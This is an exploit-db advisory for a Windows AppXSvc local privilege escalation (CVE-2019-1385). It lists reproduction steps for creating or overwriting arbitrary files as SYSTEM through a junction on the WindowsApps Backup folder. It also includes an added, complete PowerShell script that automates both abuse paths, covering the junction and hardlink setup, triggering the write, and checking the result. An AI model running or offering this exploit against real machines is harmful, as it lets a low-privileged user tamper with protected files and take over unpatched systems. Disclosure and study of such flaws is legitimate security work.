Microsoft Windows AppXsvc Deployment Extension – Privilege Escalation

  • Author: Abdelhamid Naceri
    Date: 2019-11-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47713/
  • # Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
    # Date: 2019-11-22
    # Exploit Author: Abdelhamid Naceri
    # Vendor Homepage: www.microsoft.com
    # Tested on: Windows 10 1903
    # CVE : CVE-2019-1385
    
    
    Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability
    
    Class: Local Elevation of Privileges
    
    Description:
    This PoC exploits a vulnerability in the AppX Deployment Service (AppXSvc). Abusing it
    lets an attacker create or overwrite a file as SYSTEM, which can result in EoP.
    There are two ways to abuse the issue.
    Steps to reproduce:
    [1] Arbitrary file creation
    1. Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to
       your target directory, for example "C:\".
    2. Open PowerShell and run: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
    3. Check the target directory; the file should now have been created there.
    4. Enjoy :)
    [2] Arbitrary file overwrite
    1. Create a temp directory under %temp%\
    2. Inside that temp directory, create a hardlink to your target file
    3. Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to
       the temp directory
    4. Open PowerShell and run: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
    5. Check the target file again
    Limitation:
    When 'MicrosoftEdge.exe' is created it inherits the permissions of the directory it lands
    in, which means the file will not be writable by the attacker in the majority of cases.
    A simple example of abuse is the directory "C:\": its default ACL grants Authenticated
    Users only "append data / add subdirectory" on the folder itself (so they cannot create
    files there directly) but grants them Modify on subfolders and files, so a file that
    SYSTEM creates in "C:\" inherits that Modify ACE. If we abuse the vulnerability in "C:\"
    we therefore get an arbitrary file that is created by SYSTEM and is also writable by a
    normal user.
    Also, you cannot overwrite files that are not writable by SYSTEM. I didn't add a check for
    this in the PoC because if the file is not readable by the current user the check would
    return false even when the file is writable by SYSTEM. NOTE: you can also overwrite files
    that you cannot even read.
    For file creation, make sure the path is writable by SYSTEM, otherwise the PoC will fail.
    I think 99% of folders are writable by SYSTEM.
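    The two reproduction procedures above, plus the ACL check from the Limitation section, as one added PowerShell example. This is not the advisory's own PoC; it is written here to show the whole sequence (junction, optional hardlink, triggering the SYSTEM write, verifying) from a standard-user session. It assumes what the advisory states: that the Backup directory under WindowsApps can be replaced by a junction, that AppXSvc writes a file named MicrosoftEdge.exe into it, and that re-registering the Edge main package triggers that write. The default values of $Target and $TargetFile are placeholders for a lab machine, and the script assumes the current user can remove any pre-existing Backup directory.

```powershell
# Added example (not the advisory's own PoC): drives the two abuse paths
# described above from a standard-user PowerShell session.
param(
    [ValidateSet('Create', 'Overwrite')]
    [string]$Mode = 'Create',
    # Directory that SYSTEM will create MicrosoftEdge.exe in (Create mode).
    [string]$Target = 'C:\',
    # Existing file to be overwritten via a hardlink (Overwrite mode). Placeholder.
    [string]$TargetFile = 'C:\lab\victim.txt'
)

$Backup   = Join-Path $env:LOCALAPPDATA 'Microsoft\WindowsApps\Backup'
$Family   = 'Microsoft.MicrosoftEdge_8wekyb3d8bbwe'
$FileName = 'MicrosoftEdge.exe'   # name the service writes, per the advisory

# The junction has to sit exactly where the Backup directory lives, so anything
# already there must go first. A leftover junction from a previous run is removed
# with rmdir, which deletes the link and never its target; a real directory is
# removed normally (assumes the user owns it, as it is under the user's profile).
if (Test-Path -LiteralPath $Backup) {
    $existing = Get-Item -LiteralPath $Backup -Force
    if (($existing.Attributes -band [IO.FileAttributes]::ReparsePoint) -ne 0) {
        cmd /c rmdir "$Backup"
    }
    else {
        Remove-Item -LiteralPath $Backup -Recurse -Force
    }
}

if ($Mode -eq 'Create') {
    $junctionTarget = $Target
    $resultPath     = Join-Path $Target $FileName
}
else {
    # Hardlink carrying the expected file name, pointing at the real victim file.
    # The advisory notes the victim need not be readable by us, only linkable.
    $tmp = Join-Path $env:TEMP ('appx-' + [guid]::NewGuid().ToString('N'))
    New-Item -ItemType Directory -Path $tmp | Out-Null
    New-Item -ItemType HardLink -Path (Join-Path $tmp $FileName) -Target $TargetFile | Out-Null
    $junctionTarget = $tmp
    $resultPath     = $TargetFile
    $before         = (Get-Item -LiteralPath $TargetFile -Force).LastWriteTimeUtc
}

# Redirect the Backup directory to wherever we want SYSTEM to write.
New-Item -ItemType Junction -Path $Backup -Target $junctionTarget | Out-Null

# Trigger the privileged write: AppXSvc (running as SYSTEM) follows the junction.
Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage $Family

# Verify the outcome as the low-privileged user.
if ($Mode -eq 'Create') {
    if (Test-Path -LiteralPath $resultPath) {
        Write-Host "Created: $resultPath"
        # Show the inherited ACEs. On the default C:\ ACL, Authenticated Users
        # inherit Modify on files, which is what makes the new file writable by us.
        (Get-Acl -LiteralPath $resultPath).Access |
            Format-Table IdentityReference, FileSystemRights, IsInherited -AutoSize
    }
    else {
        Write-Host "Not created: target not writable by SYSTEM, or the fix is installed."
    }
}
else {
    $after = (Get-Item -LiteralPath $TargetFile -Force).LastWriteTimeUtc
    if ($after -gt $before) {
        Write-Host "Overwritten: $TargetFile (mtime $before -> $after)"
    }
    else {
        Write-Host "Unchanged: $TargetFile"
    }
}
```

    Run it as `.\appxsvc-redirect.ps1 -Mode Create -Target 'C:\'` for the creation case or `.\appxsvc-redirect.ps1 -Mode Overwrite -TargetFile <path>` for the overwrite case (the script name is arbitrary). In Overwrite mode the hardlink must be created before the junction, since the junction redirects the Backup path rather than the temp directory; comparing LastWriteTimeUtc before and after is used because the overwritten file may not be readable by the current user, exactly the situation the Limitation section describes.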
    Platform:
    This has been tested on a fully patched system (latest patch -> November 2019) :
    OS Edition: Microsoft Windows 10 Home
    OS Version: 1903
    OS Version Info: 18362.418
    
    Additional Info
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx = 18362.1.amd64fre.19h1_release.190318-1202
    
    
    Expected result:
    The deployment process should fail with ERROR_ACCESS_DENIED when the Backup path points
    somewhere the user is not allowed to write.
    Observed result:
    The deployment process overwrites or creates an arbitrary file as
    "LOCAL SYSTEM"
    
    NOTE : It was patched on 7/11/19